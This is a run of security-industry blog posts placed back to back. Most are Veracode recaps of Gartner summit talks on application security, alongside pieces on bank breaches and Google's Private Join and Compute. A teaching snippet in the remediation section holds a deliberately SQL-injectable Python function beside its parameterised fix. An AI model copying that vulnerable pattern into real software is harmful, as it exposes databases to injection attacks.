Financial institutions were able to defend against two-thirds of unauthorised fraud attempts in 2018, but the scale of attacks significantly increased. Significant market players including Tesco Bank, Metro Bank and HSBC all reported breaches in the last year. Clearly, the banks’ cybersecurity defences have not developed at a fast enough pace. Cyber criminals can and will dramatically outspend their targets with increasingly sophisticated attack methods. In addition, many of the traditional banks struggle with large, cumbersome legacy systems, which pose significant reliability issues, as well as flaws in security.

Last year’s IT banking disaster led to thousands of TSB customers being locked out of their accounts, leading to fraudsters exploiting the situation by posing as bank staff on calls to customers in order to steal significant sums of money from customers. The breach occurred while the company was conducting an upgrade on its IT systems to migrate customer data to a new platform. This wasn’t just bad luck for TSB, but a failure to adequately plan and assess the risks that come with such a huge project. The bank has since pledged to refund all customers that are victims of fraud, a move which will likely see other banks reviewing their approach to the rise of this particular type of cybercrime.

The industry must understand that security incidents are an ever-present risk. However, organisations can be prepared - scoping a defence strategy specific to the firm, with processes for implementation, will mean an attack can be quickly identified, isolated and resolved, minimising business impact.

Appropriate Defence Strategy
The FCA has set out various cybersecurity insights that show how cybersecurity practices of UK financial services firms are under the regulatory microscope, as the cyber threat continues to grow. The approach from the FCA includes practices for organisations to put into action such as those that promote governance and put cyber risk on the board agenda. The advice also covers areas such as identifying and protecting information assets, being alert to emerging threats and being ready to respond, as well as testing and refining defences. With cybercrime tools and techniques advancing at a rapid pace, and increasing regulations, it’s no wonder that many organisations struggle to keep up to ensure their defences stay ahead of the game.

In order for in-house security teams to keep up to date with current and evolving threats and data protection issues, firms must invest in regular training. Specialist skills are required to mitigate cyber risk, which for some could be cost-prohibitive. As an alternative, an outsourced model allows you to leverage a dedicated and skilled team on an ‘as you need’ basis to deliver an appropriate strategy. With a Cyber Security as a Service (CSaaS) model in place, organisations can rapidly access a dedicated team with the knowledge and skills to deliver a relevant and risk-appropriate cyber security strategy.

Crucially, in addition to completing a gap analysis and a multi-layered defence strategy, the model will also apply to people and processes. Attackers will generally aim at the weakest point of an organisation – often it’s staff. Human nature means passwords are forgotten, malware isn’t noticed, or phishing emails are opened, for example. Therefore, a blended approach of technology, processes and shared behaviour is required that promotes the need for staff awareness and education of the risks, in order to effectively combat the threat.

Conclusion
With increased regulatory attention across security and privacy, firms must take steps to improve their defences, or risk severe financial and reputational damage. The issue of cybersecurity risk must become as embedded within business thinking as operational risk. Anyone within an organisation can be a weak link, so the importance of cybersecurity defences must be promoted at all levels – from the board all the way through to the admin departments. It’s everyone’s responsibility to keep the organisation protected against threats.

While the threat of cyber attack is real, financial services firms do not have to take on the battle alone. With a CSaaS model in place, organisations can start to take back control of their cybersecurity strategy and embed it as a trusted, cost-effective and workable core part of the business’ process.

Live From Gartner Security & Risk Mgmt Summit: Starting an AppSec Program, Part 2

This is part two of a two-part blog series on a presentation by Hooper Kincannon, Cyber Security Engineer at Unum Group, on “Secure from the Start: A Case Study on Software Security” at the Gartner Security & Risk Management Summit in National Harbor, MD. In this presentation, Hooper provided a great blueprint for starting a DevSecOps program. In part one, I summarized how Hooper got buy-in for his program and his overall plan for the initiative. In this blog, we delve into the details.

Using Different Assessment Types for the Right Purpose

Hooper kindly shared his slides with us. Here is his helpful comparison of different assessment types, focusing on static analysis, dynamic analysis and manual penetration testing:

You have to make a choice about which route you’d like to take. In Hooper’s case, he decided to build static and dynamic application security testing into the SDLC.

Dynamic and Static Analysis Workflow

For dynamic analysis testing, Hooper recommends the following workflow:

To make your DAST assessments successful, he recommended using a consistent scan duration, considering the various authentication mechanisms, and using the testing credentials only for testing.

For static analysis testing, he recommended the following workflow:

His recommendations for static analysis testing included being conscious of how you define applications, being aware of compilation instructions, and consistency of the process.

Understanding Remediation vs. Mitigation

After you have identified a vulnerability, you can address it in two different ways:

  • Remediation: Fixing the security defect by changing the code that contains the defect or making a configuration change. This eliminates the risk.
  • Mitigation: Implementing controls to make it less likely that the vulnerability is exploited. This reduces the risk but does not eliminate it because the vulnerability is still present in the code.
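A simple illustration of remediation (our example, not from the talk): the code change below replaces string-built SQL, a classic injection flaw, with a parameterized query. A mitigation, by contrast, would leave the vulnerable code in place and rely on a compensating control such as a WAF rule in front of it.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

def find_user_vulnerable(name: str):
    # Flawed: attacker-controlled input is concatenated into the SQL statement.
    return conn.execute(f"SELECT email FROM users WHERE name = '{name}'").fetchall()

def find_user_remediated(name: str):
    # Remediated: the driver binds the parameter, so input can't change the query structure.
    return conn.execute("SELECT email FROM users WHERE name = ?", (name,)).fetchall()

print(find_user_remediated("alice"))
```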

Working With Scanning Results

How you use your scan results can make or break your program. If you’re fortunate, you’ll scan your application and get back a low volume of flaws. If you’re unlucky, it may be the opposite.

Hooper’s biggest recommendation is not to panic: The overall goal is to reduce risk, and that won’t happen overnight. Take your time to digest the results and discuss how to best prioritize them. For example, consider fixing dynamic results first because they are easier to discover by an attacker. Decide what you accept as trusted sources, especially in the case of input validation, and have a process for handling exceptions, such as acceptable risk, mitigations, and false positives. Hooper recommends that you do a readout of the results with the stakeholders.

Picking the Right Metrics to Report On

Metrics are probably the most important deliverable coming out of your program. Security itself is difficult to measure; reduction in risk is a bit easier.

Metrics that worked for Hooper are:

  • Flaw density
  • Risk reduced (vulnerability severity reduced)
  • Most common flaw types (use to guide education efforts)
  • Compliance over time
  • Onboarding time + other operational metrics
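As a toy example of two of these metrics, the snippet below computes flaw density, here defined as flaws per thousand lines of code (definitions vary), and a severity-weighted risk-reduction figure from hypothetical scan data; the weights are arbitrary.

```python
def flaw_density(flaw_count: int, lines_of_code: int) -> float:
    """Flaws per 1,000 lines of code (KLOC)."""
    return flaw_count / (lines_of_code / 1000)

def risk_score(flaws_by_severity: dict) -> int:
    """Severity-weighted score; the weights here are arbitrary examples."""
    weights = {"very_high": 10, "high": 5, "medium": 2, "low": 1}
    return sum(weights[sev] * count for sev, count in flaws_by_severity.items())

baseline = {"very_high": 4, "high": 12, "medium": 30, "low": 55}
current  = {"very_high": 1, "high": 6,  "medium": 25, "low": 50}

print(f"Flaw density: {flaw_density(sum(current.values()), 120_000):.2f} per KLOC")
reduction = 1 - risk_score(current) / risk_score(baseline)
print(f"Risk reduced: {reduction:.0%}")
```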

When presenting to the different stakeholders of the program, be aware of what each constituency is interested in – because it varies:

  • CISO + senior management: Profitability of the investment
  • Business leaders: Resource allocation
  • Development: Staying on top of flaws

Keeping a regular cadence is vital. Hooper has made these activities part of his program:

  • Monthly scorecards
  • Monthly executive dashboards
  • Annual reviews
  • Real-time dashboards for developers

Optimizing the Program in Year Two

One year after starting the program, Hooper had reached success with external high-risk applications. Next, he moved on to internal high-risk applications. In addition, he started to automate more and more of the program to make it repeatable and easier to manage. For most organizations, he recommends starting out with automation from day one, but even if you start out manually, you’re taking a step in the right direction.

Here is a picture of how Unum Group integrates Veracode into their SDLC:

For More Information

If you’re interested in starting your own application security program, read our take on Everything You Need To Know About Getting Application Security Buy-In.

Live From Gartner Security & Risk Mgmt Summit: Starting a Web Application Security Program

Bootstrapping an application security program is hard. Technology is only one part of the equation. You need to inventory your applications, get stakeholders on board, and then execute on the holy trinity of people, process, and technology. That’s why I was excited to see Hooper Kincannon, Cyber Security Engineer at Unum Group, present on “Secure from the Start: A Case Study on Software Security” at the Gartner Security & Risk Management Summit in National Harbor, MD. Hooper provided a great blueprint for starting a DevSecOps program.

Sixty Vulnerabilities Are Reported Every Day, 27 Percent Are Never Fixed

Hooper began his presentation by outlining the current state of both software and software security. He points out that while software is changing the world, it is also fundamentally flawed from a security perspective.

He points to some highlights from a study by Risk Based Security:

  • More than 22,000 vulnerabilities were disclosed in 2018 – that’s about 60 per day.
  • Almost a third of these (27%) were never fixed, so security professionals can’t just deploy a patch to improve their security posture.
  • Web-related vulnerabilities accounted for nearly half of all reported security flaws, and more than two-thirds were related to insufficient or improper validation of input.
  • 33% received a severity rating of seven or above.
  • The OWASP Top 10 still accounts for two-thirds of the reported vulnerabilities.

What can we do about it? We can develop a secure software development lifecycle and try to stem the flow of vulnerabilities being published in the first place. This is becoming increasingly difficult because more lines of code are being written than ever before (111 billion lines of code in 2016, trending up).

Software Is Becoming Mission Critical: Making the Case for AppSec

So what if Alexa won’t work or my app crashes? Both would probably only be minor annoyances, but software is also impacting us on a much larger scale. Not too long ago, people would be lucky if they had only a two-minute warning that a tornado was coming. Today, weather monitoring and modeling software can predict the formation and path of a tornado with stunning accuracy. And better still they can send text messages to those in danger – providing precious minutes to find shelter.

Farming is being transformed by software as well. Software monitors the moisture levels in soil, and irrigation systems connected to these sensors release the optimal amount of water into the soil. This way, the crops have what they need to grow, and not a drop of water is wasted. There are technologies that monitor crop growth and health and even harvest crops. In other words, software is tackling world hunger. That’s something worth protecting.

When you want to demonstrate to your stakeholders why application security is important to your organization, go back to your company’s mission and ladder up your argument to this ultimate goal. Unum offers disability, life and financial protection to its customers. If your mission is to help people at their most vulnerable moments in life, you need to ensure that they don’t have to worry about their identity being stolen as the result of a data breach in addition to having to figure out medical payments. Making this connection with the core mission can really help tell a story of why application security is crucial to the business.

Starting Out With the Right Questions

Before you can dive head first into your DevSecOps program, you need to ask yourself the right questions:

  • Do you know your application portfolio?
  • Do you have web application security policies defined?
  • Who is responsible for the web application security program?
  • Who is going to fund the program?
  • What is your goal?

Only once you have answered these questions will you be able to find the right formula for your organization. Hooper laid out his program in the rest of the talk, but your organization may differ, so make sure that you ask these questions at the outset.

Building a DevSecOps Program from Scratch

Hooper started at Unum about three years ago as a member of their threat and vulnerability management team. At that point in time, they didn’t have a true web application security program, but they had a relationship with Veracode to assess their top-tier applications, and they were doing basic dynamic analysis with another vendor. At that point, Hooper was fortunate enough to get funding to help expand and mature the program. 

Unum’s primary goal was to reduce risk, so he set out to discover and rate the risk of all of their applications. He helped define security policies for all web applications, including expectations and remediation SLAs. They also decided that security should be responsible for the administration of the AppSec program, and development would cover remediation. 

Hooper chose to expand his relationship with Veracode, covering SAST, DAST, SCA, and eLearning. He also partnered with Veracode to provide live trainings for developers, and signed up for their program management and application security consulting services, which help onboard scrum teams and help developers fix security defects if they get stuck.

In a follow-up blog, we will delve into the details of Hooper’s AppSec program and his path to AppSec maturity.

Live From Gartner Security & Risk Mgmt Summit: How to Approach Container Security

Container security is a topic most security practitioners still find confusing. It’s a new technology that’s spreading fast because of its numerous benefits, and security implications and solutions are evolving just as fast.

That’s why I really appreciated Anna Belak’s session “Container Security – From Image Analysis to Network Segmentation” at the Gartner Security & Risk Management Summit in National Harbor, MD. Anna provided a great framework for thinking about container security that I would like to share with you.

Divide and Conquer: Images, Orchestration, Runtime

After introducing the audience to all of the security challenges and attack vectors for containers, she broke down a container security program into three sections:

  • Securing container images
  • Securing the orchestration plane 
  • Securing containers at runtime 

Today, there’s no security vendor that helps with all three of these areas. Because Veracode focuses on application development security, we focus on securing container images, not the operational parts.

Inside the Sausage Factory: How the Docker Image is Made

A Docker container image is a lightweight, standalone, executable package of software that includes everything you need to run an application: code, runtime, system tools, system libraries and settings. Docker’s run utility is the command that actually launches a container. Each container is an instance of an image, and multiple container instances of the same image can be run simultaneously. Docker images are ephemeral: Container deployments are in constant flux. The average lifetime of a container is 30 minutes. 

The Docker Hub registry is a repository for sharing container images from open source projects and from software vendors. These images are leveraged by developers – often introducing additional risk to the organization.
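One hedged sketch of looking inside an image before trusting it: the snippet below shells out to the Docker CLI to enumerate the OS packages baked into a Debian-based image, a list you could then feed to software composition analysis. It assumes the docker binary is on the PATH and that the image uses dpkg.

```python
import subprocess

def image_packages(image: str) -> list:
    """List package==version pairs inside a Debian/Ubuntu-based image."""
    result = subprocess.run(
        ["docker", "run", "--rm", "--entrypoint", "dpkg-query", image,
         "-W", "-f", "${Package}==${Version}\n"],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.splitlines()

# Example: enumerate packages in a base image, then hand the list to your
# SCA tooling to match against known-vulnerable versions.
for pkg in image_packages("debian:stretch-slim")[:10]:
    print(pkg)
```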

In her talk, Anna referenced a study of 3,802 official images on the Docker Hub that found a median of 127 vulnerabilities per image. Even more shocking: There were zero images that did not have any vulnerabilities.

Gartner’s Top Recommendations on Container Security

The talk closed with three recommendations:

  • Secure containers holistically by integrating controls at key steps in the CI/CD pipeline. Focusing solely on runtime controls – as you would for software installed on VMs – will leave you vulnerable on many fronts.
  • Use secrets management and software component analysis as primary container protection strategies. Add Layer 7 network segmentation for operational containers that require defense in depth.
  • Select vendors that can integrate with the container offerings of leading cloud service providers, such as Amazon Web Services, Microsoft Azure, and Google Cloud Platform.

Veracode can help you with the first recommendation: Veracode Software Composition Analysis scans container images for vulnerabilities as part of your CI/CD pipeline to help you find vulnerabilities in the production image. If you’re interested in more information, read our blog post How Veracode Scans Docker Containers for Open Source Vulnerabilities.

Embracing the “Sec” in DevSecOps: How Veracode and AWS Work Together to Help You Build Secure Apps

Developers, like most builders, are creative critical thinkers who take pride in their work. Let’s focus on the word “builder” for a moment. During the industrial revolution, time-consuming manufacturing processes were made more efficient through automation, and the assembly line and interchangeable parts transformed businesses. The idea was to build as quickly as possible at lower cost. Transpose this to software engineering and we see a similar trend: building software as quickly as possible, using components, and decreasing costs. Implicit in this is the direct correlation between the quality of the components and the quality of the final product. This raises the question: why, then, are developers selecting poor or insecure components to build their applications? I would argue that the intention to build stable and secure software has always existed, but there is a general lack of awareness and overall confusion about the best approach. We need only look at the latest headlines to read about Fortune 500 companies that have been victims of vulnerabilities despite their best efforts to ship software they thought to be secure. So how does intent go beyond a mere idea and get put into design and practice to mitigate these concerns in the most comprehensive and reliable way possible?

Before we are able to answer that, it is important that we consider a few facts:

  1. Modern applications are complex and made up of various components.
  2. Open source has grown and has found its way into millions of applications across various industries spanning private, public, and even government sectors.
  3. Application security has traditionally been reactive and found later in the development life cycle.

Cloud adoption has made it easier for developers to be empowered not only to build their applications, but also to provision the supporting infrastructure. Take, for example, a fully managed CI/CD pipeline on AWS composed of AWS CodeCommit, AWS CodePipeline, and AWS CodeBuild, with container deployments to AWS Fargate. If you find yourself in a similar scenario, or aspire to migrate to AWS to use these services, which tools do you use, and how do you leverage them correctly to ensure that you are building secure applications? If you are using open source components, how do you ensure that you are using the right versions, or find out where those components are being downloaded from? These questions extend to your container images as well. Container images are often opaque: they typically contain various layers, and it is not immediately clear what security vulnerabilities may be contained within each of them. Are you including inspection of these layers in your automated workflows?

One of the more prominent blockers to applying security is the perception that doing so will inevitably hurt time to market. Developers are often under time constraints and focused on building applications and releasing features as expeditiously as possible. Couple this with the complexity of modern architectures, the use of external components, and the lack of prescriptive guidance on using the right tools at the appropriate stage of the development life cycle, and frustration mounts; the expected reaction is avoidance. In other words, we acknowledge the problem and vaguely understand there may be a way to resolve it, but we are not clear on how to accomplish that, so we decide it’s not worth the effort today. After all, there’s always tomorrow.

The truth is that this need not be as daunting as it may seem on the surface. The journey begins with understanding your process and gaining insight into your environment: if you don’t know where your vulnerabilities exist today, how can you effectively resolve them? Second, it’s about applying security at every stage of the process. There are several tools that address specific concerns and were built for specific audiences: security teams, AppSec teams, and development teams. Use them accordingly. For example, there is a place for static analysis (SAST), software composition analysis (SCA), and dynamic analysis (DAST), as well as monitoring tools designed for finding security defects and completing the feedback loop. It’s critical to understand that you may build a secure application today, but can you quickly iterate and resolve the vulnerabilities that have yet to be discovered before they negatively impact your business or your customers? These considerations are necessary for any business to survive in today’s competitive landscape. Sure, you need to ship features as quickly as possible, but you need to do so without compromising security.

This is where solutions such as those available today from Veracode are integral for any business. Veracode is a full-spectrum application security testing solution that begins with Veracode Greenlight in the developer’s IDE and spans the development life cycle through Veracode Manual Penetration Testing, so you are covered throughout the entire software development life cycle. From the moment developers begin writing code and pushing commits, Veracode Software Composition Analysis (SCA) identifies open source vulnerabilities and provides crisp remediation guidance. Integrate Veracode Static Analysis (SAST) into your build and test tools and processes to quickly identify security flaws in your code. Lastly, Veracode Dynamic Analysis (DAST) in your release, deployment, and operations process reduces your risk of a breach once your application goes live. These are easily integrated with AWS CodePipeline and CodeBuild to secure your fully managed CI/CD pipelines running in the AWS cloud.

As the complexity of modern applications continues to increase, introducing security into every stage of your development life cycle becomes a necessity. We live in a highly competitive world with a voracious appetite for innovation. It is critical for businesses to deliver quickly and satisfy customer demand, but equally critical to preserve customer trust. It is possible to do both without compromising one for the other, and the solutions exist today.

Learn more at AWS re:Inforce this month in Boston – Veracode will be at Booth 813, and speaking on Wednesday the 26th on “Integrating AppSec Into Your DevSecOps on AWS.”

Helping organizations do more without collecting more data



We continually invest in new research to advance innovations that preserve individual privacy while enabling valuable insights from data. Earlier this year, we launched Password Checkup, a Chrome extension that helps users detect if a username and password they enter on a website have been compromised. It relies on a cryptographic protocol known as private set intersection (PSI) to match the credentials you enter against an encrypted database of over 4 billion credentials Google knows to be unsafe. At the same time, it ensures that no one – including Google – ever learns your actual credentials.

Today, we’re rolling out the open-source availability of Private Join and Compute, a new type of secure multi-party computation (MPC) that augments the core PSI protocol to help organizations work together with confidential data sets while raising the bar for privacy.


Collaborating with data in privacy-safe ways

Many important research, business, and social questions can be answered by combining data sets from independent parties where each party holds their own information about a set of shared identifiers (e.g. email addresses), some of which are common. But when you’re working with sensitive data, how can one party gain aggregated insights about the other party’s data without either of them learning any information about individuals in the datasets? That’s the exact challenge that Private Join and Compute helps solve.

Using this cryptographic protocol, two parties can encrypt their identifiers and associated data, and then join them. They can then do certain types of calculations on the overlapping set of data to draw useful information from both datasets in aggregate. All inputs (identifiers and their associated data) remain fully encrypted and unreadable throughout the process. Neither party ever reveals their raw data, but they can still answer the questions at hand using the output of the computation. This end result is the only thing that’s decrypted and shared in the form of aggregated statistics. For example, this could be a count, sum, or average of the data in both sets.


A deeper look at the technology 


Private Join and Compute combines two fundamental cryptographic techniques to protect individual data:

  • Private set intersection allows two parties to privately join their sets and discover the identifiers they have in common. We use an oblivious variant which only marks encrypted identifiers without learning any of the identifiers.
  • Homomorphic encryption allows certain types of computation to be performed directly on encrypted data without having to decrypt it first, which preserves the privacy of raw data. Throughout the process, individual identifiers and values remain concealed. For example, you can count how many identifiers are in the common set or compute the sum of values associated with marked encrypted identifiers – without learning anything about individuals. 

This combination of techniques ensures that nothing but the size of the joined set and the statistics (e.g. sum) of its associated values is revealed. Individual items are strongly encrypted with random keys throughout and are not available in raw form to the other party or anyone else.
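
As a simplified, hedged illustration (the exact construction is specified in the full paper), an additively homomorphic scheme such as Paillier lets ciphertexts of the matched values be combined without ever decrypting the individual entries:

$$ E(v_1) \cdot E(v_2) \cdots E(v_k) \bmod n^2 \;=\; E\big(v_1 + v_2 + \cdots + v_k \bmod n\big) $$

The party holding the encrypted, matched records combines the ciphertexts and returns a single result, which the other party decrypts to learn only the aggregate sum.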

Watch this video or click to view the full infographic below on how Private Join and Compute works:

Private Join and Compute

Using multi-party computation to solve real-world problems


Multi-party computation (MPC) is a field with a long history, but it has typically faced many hurdles to widespread adoption beyond academic communities. Common challenges include finding effective and efficient ways to tailor encryption techniques and tools to solve practical problems.

We’re committed to applying MPC and encryption technologies to more concrete, real-world issues at Google and beyond by making privacy technology more widely available. We are exploring a number of potential use cases at Google across collaborative machine learning, user security, and aggregated ads measurement.

And this is just the beginning of what’s possible. This technology can help advance valuable research in a wide array of fields that require organizations to work together without revealing anything about individuals represented in the data. For example:

  • Public policy - if a government implements new wellness initiatives in public schools (e.g. better lunch options and physical education curriculums), what are the long-term health outcomes for impacted students?
  • Diversity and inclusion - when industries create new programs to close gender and racial pay gaps, how does this impact compensation across companies by demographic?
  • Healthcare - when a new preventative drug is prescribed to patients across the country, does it reduce the incidence of disease? 
  • Car safety standards - when auto manufacturers add more advanced safety features to vehicles, does it coincide with a decrease in reported car accidents?

Private Join and Compute keeps individual information safe while allowing organizations to accurately compute and draw useful insights from aggregate statistics. By sharing the technology more widely, we hope this expands the use cases for secure computing. To learn more about the research and methodology behind Private Join and Compute, read the full paper and access the open source code and documentation. We’re excited to see how other organizations will advance MPC and cryptography to answer important questions while upholding individual privacy.


Acknowledgements


Product Manager - Nirdhar Khazanie
Software Engineers - Mihaela Ion, Benjamin Kreuter, Erhan Nergiz, Quan Nguyen, and Karn Seth
Research Scientist - Mariana Raykova


Live From Gartner Security & Risk Mgmt Summit: Pair Security Trainings With Technical Controls

“We often forget that technology cannot solve the world’s problems.” That was one of the opening lines of Joanna Huisman’s session “Magic Quadrant for Security Awareness Computer-Based Training” at the Gartner Security & Risk Management Summit in National Harbor, MD. While her Magic Quadrant doesn’t address DevSecOps trainings, I took away some valuable lessons that also apply to this area.

20 percent of users will never change behavior, no matter how well you train

Traditional awareness efforts are based on the belief (or hope) that information leads to action. In other words, the problem with trainings is that “awareness” does not automatically result in secure behavior: About 20 percent of learners are never going to do the right thing, no matter how much you train them.

Let’s think this through for a moment: 80 percent of your audience will follow your advice to some extent, so you will get an improvement, but 20 percent will not change their behavior. Most security professionals aim to reward users who follow security process but are reluctant to punish the ones who don’t because they don’t want to be the bad guys. Even if they are prepared to go through with punitive actions, it may be counter to corporate culture (and generally not a good teaching practice).

Education is good, but it must be coupled with technical controls

This means that while security awareness does improve your security posture, you still need technical controls in place to mitigate the rest. In the case of DevSecOps, this translates into a combination of secure coding trainings and automated application security testing. The training reduces the number of vulnerabilities introduced into the code, which in turn reduces the cost of your DevSecOps program, because security defects that never enter the code are much cheaper than those found in production. The security testing serves as a feedback loop for developers and as a gate to stop security defects from escaping to production.

At Veracode, we offer courses to teach the fundamentals of secure coding, both as eLearning and live sessions. With Veracode Greenlight, we provide instant feedback on code security as developers are typing code in their IDE. And we provide feedback via ticketing systems and a security gate as part of Veracode Static Analysis. If developers get stuck fixing a vulnerability, they can book our application security consultants for a coaching session to help fix their security defect.

Learn more about Veracode’s Developer Training.

Application Security Beyond Static Analysis

There is no application security “silver bullet” – it takes a combination of testing types to effectively reduce your risk. Each testing method has a different role to play and works best when used in harmony with others.

For instance, our research showed that there are significant differences in the types of vulnerabilities you discover dynamically at runtime compared to those you’ll find when doing static testing in a non-runtime environment. In fact, two of the top five vulnerability categories we found during dynamic testing weren’t even among the top five found by static, with one not found by static at all.

Add to this the fact that applications are increasingly “assembled” from open source components, rather than developed from scratch, and software composition analysis becomes an important part of your testing mix. Neglecting to assess and track the open source components you use leaves a large portion of your code unexamined and leaves you open to attack.

And finally, automation alone is not enough to ensure an application is thoroughly tested from a security perspective. Some flaws, such as CSRF (Cross-Site Request Forgery) and business logic vulnerabilities, require a human to be in the loop to exploit and verify the vulnerability. Only manual penetration testing can provide positive identification and manual validation of these vulnerabilities.

Here's an overview of the different types of vulnerabilities found by different testing types:

  • Flaws in custom web apps (CWEs): static analysis, dynamic analysis, manual penetration testing
  • Flaws in custom non-web apps (CWEs): static analysis, manual penetration testing
  • Flaws in custom mobile apps (CWEs): static analysis, manual penetration testing
  • Known vulnerabilities in open source components (CVEs): software composition analysis, manual penetration testing (1)
  • Behavioral issues (CWEs): static analysis (2), manual penetration testing
  • Configuration errors (CWEs): dynamic analysis, manual penetration testing
  • Business logic flaws (CWEs): manual penetration testing
  • Repeatable process for automation: static analysis, software composition analysis, dynamic analysis
  • Scalable to all corporate applications: static analysis, software composition analysis, dynamic analysis
  • Scan speed: static analysis, seconds to hours; software composition analysis, seconds to minutes; dynamic analysis, hours; manual penetration testing, days to weeks
  • Cost per scan: static analysis, software composition analysis, and dynamic analysis, $; manual penetration testing, $$

(1) Penetration testing can find known vulnerabilities in open source components, but this may not be as rigorous as Veracode Software Composition Analysis, which not only systematically flags CVEs but also crawls commit histories and bug tracking tickets in open source projects to identify silent fixes of security issues.

(2) This is not true for all static analyzers. Veracode can exercise the code and manipulate the UI for behavioral analysis in mobile applications.

Here’s a summary of when to use each testing type:

Static analysis (with entire application in scope)

Advantages:

  • Very broad coverage of flaw types (CWEs)
  • Looks at flaws in the context of the entire application, analyzing all the data paths
  • Can scan any type of application, including web, mobile, desktop, or microservices
  • Scanning frequency should be in line with how often developers can review scan results
  • Use static analysis as part of a Continuous Delivery pipeline and file security issues in the bug tracking system
  • Can track flaw history (new, open, fixed), which is important for trending reports on mean time to remediation
  • Suitable for compliance purposes

Limitations:

  • Does not provide instant feedback to developers as they’re coding
  • Cannot find CWEs related to server configurations
  • Limited to code that developers can remediate
  • Does not report vulnerabilities in third-party components (see: SCA)

Static analysis (on file level, e.g., Greenlight)

Advantages:

  • Recommended for development teams who want to shift left in application security testing by scanning early and often; scans usually complete in seconds
  • Best suited when scanning multiple times per day
  • Recommended for use by developers working on new code, for continuous flaw feedback and remediation guidance
  • Developer friendliness: enhances learning and allows developers to find and address issues without exposing flaws in reports

Limitations:

  • Scans individual files, so it can only detect vulnerabilities where source and sink are in the same file
  • Typically not suited for compliance scanning because scope limitations may cause false negatives
  • Does not report vulnerabilities in third-party components

Dynamic analysis

Advantages:

  • Scans web applications without having to integrate with the SDLC
  • Ability to scan in pre-production and production
  • Suitable for compliance purposes

Limitations:

  • Scan times are often between 12 and 24 hours for complex applications, so it is best suited to overnight or asynchronous scanning

Software composition analysis

Advantages:

  • Finds vulnerabilities in third-party components
  • Scans take seconds or minutes
  • Can scan any type of application, including web, mobile, desktop, or microservices
  • Suitable for compliance purposes

Limitations:

  • Does not find flaws in first-party code

For more details, check out our new guide, Application Security Best Practices.

Live From Gartner Security & Risk Mgmt Summit: Running Midsize Enterprise Security

Over the past few months, I’ve experienced an increased interest in DevSecOps from midsize enterprises, so I was especially interested in attending Neil Wynne and Paul Furtado’s session “Outlook for Midsize Enterprise Security and Risk Management 2019” at the Gartner Security & Risk Management Summit in National Harbor, MD this week.

57 Percent of Midsize Enterprises Don’t Have a CISO

Gartner defines midsize enterprises as companies with less than $20 million in IT budget. At that size, they have up to 30 people in IT, which means that 57 percent of this group do not have enough security staff to warrant a CISO. As a result, the CIO is accountable for cybersecurity in most midsize enterprises.

According to Gartner, midsize enterprises spend an average of $1,089 on IT security per employee. About 6 percent of IT headcount is dedicated to security, so you need at least 17 people in IT before you can dedicate a full headcount to security; below that threshold, it’s only partial headcounts. That’s a lot of security ground to cover with very little headcount, and you can completely forget about 24/7 coverage for security operations. To make things worse, midsize enterprises are hit even harder by the InfoSec skills gap because they often cannot compete with Fortune 500 salaries and benefits.

How Can Midsize Enterprises Address These Challenges?

Paul Furtado, Sr. Director Analyst at Gartner, recommends the following guidelines for addressing these challenges:

  • Create a baseline: What are you doing today?
  • Know what to protect: You won’t know what to protect if you don’t know what’s critical to the business. Identify your most critical data: PII, IP, partner/customer lists, business-critical applications. If you don't know that, you're spending money in the wrong areas.
  • Know your risk appetite: Categorize all risks by business impact and risk scenario likelihood, then prioritize and decide what’s a level of acceptable risk for the organization.
  • It’s a combined effort: Security is a combination of people, process, and technology.
  • Apply best practices: You are not the first one to set up a security program – learn from others.  

Framing Security Spending With Executive Leadership

Before Paul joined Gartner, he spent decades working in the trenches at midsize enterprises. Most executive leaders ask why they should be spending dollars on security. I loved his response: “I’m not taking a dollar from you, I’m protecting the dollars for you.” This is a great mindset shift that I can absolutely see working with executives.

I also liked how he boiled down the basics of what a security program must do:

  • Keep bad guys out 
  • Let good guys in
  • Keep the wheels on

I often see security professionals over-rotate on the first item, which is most important to them. However, let’s not forget, items two and three are more important to everyone else in the business!

Be Pragmatic and Don’t Do Everything In-House

With very limited resources, you cannot do everything in-house. You need to outsource some of the work to be successful. Use cloud solutions and vendors that can supply you with specialized knowledge and round-the-clock coverage. As Paul summed it up: “We could do this ourselves, but it’s not a good use of our people.”

A Recipe for a Successful Security Program in Midsize Enterprise

Paul summed up his recommendations as follows:

  • Do the simple things well. This means the more difficult things in IT security become easier. Complexity is the enemy of security. 
  • Start to seriously examine how to leverage your security spending with multiplication platforms.
  • Demand a secure development life cycle and “built-in” security for IT components.
  • Constantly re-evaluate your risk tolerance and your good-enough security comfort level.
  • Investigate emerging security services.

Of course, working in application security, number three resonated most with me, so I’d like to dig into this one a little and tie it back to all of his recommendations.

How to Do DevSecOps in Midsize Enterprises

Key takeaways from Paul’s talk are that you cannot do everything in-house because of lack of headcount and skills shortage in InfoSec. Veracode can help you address both of these challenges.

Let’s get to lack of headcount first. Veracode is the only SaaS-native Leader in the Gartner 2019 Magic Quadrant for Application Security Testing, and we have been a Leader six times in a row. As a midsize enterprise, you don’t have the time to set up and maintain an application security scanning infrastructure, especially if you have to support multiple geographic sites as well as high availability and scalability for critical DevOps teams. Using Veracode is like having DevSecOps on tap: you don’t have to set up any infrastructure, so your developers can start scanning on day one.

Now let’s discuss skills shortage. If you only have a couple of InfoSec people on your team, you will struggle to offer specialized knowledge for developers who need help remediating specific vulnerabilities in their code, especially if your team covers a broad set of languages. At Veracode, we have a dedicated team of application security consultants that your developers can tap into to get help with their code. In addition, our security program managers can onboard your scrum teams onto our platform and help them automate the security scanning.

Security as a Competitive Advantage

As a midsize enterprise, you are often subject to security scrutiny when selling to the Fortune 500, especially when the value you deliver to your customers involves software, either directly or indirectly. Veracode is the only application security testing vendor to offer the Veracode Verified Program, which helps you show your customers that you take security seriously. Many of our midsize enterprise customers even use their Veracode Verified logo as a competitive advantage. Check out some of these companies in the Veracode Verified Directory.

 

“You may not have the need today, but it’s well worth doing the research today.”

How Veracode Supports DevSecOps Methodologies With SaaS-based Application Security

Veracode Kuppinger Cole Report

Most legacy applications were not developed with security in mind. However, modern businesses and organizations continue to undergo digital transformation in order to pursue new business models and revenue channels, as well as give their customers or constituents a simplified experience. This often means selecting cloud-based tools and solutions that provide the scalability necessary to deliver applications and services to a broad customer base.

For example, in 2013, the UK government adopted a Cloud First, or Cloud Native, policy for all technology decisions, making it mandatory to consider cloud solutions before alternatives. This means that government IT professionals must first consider public cloud options, including SaaS models for enterprise IT and back-office functions, as well as Infrastructure as a Service and Platform as a Service.

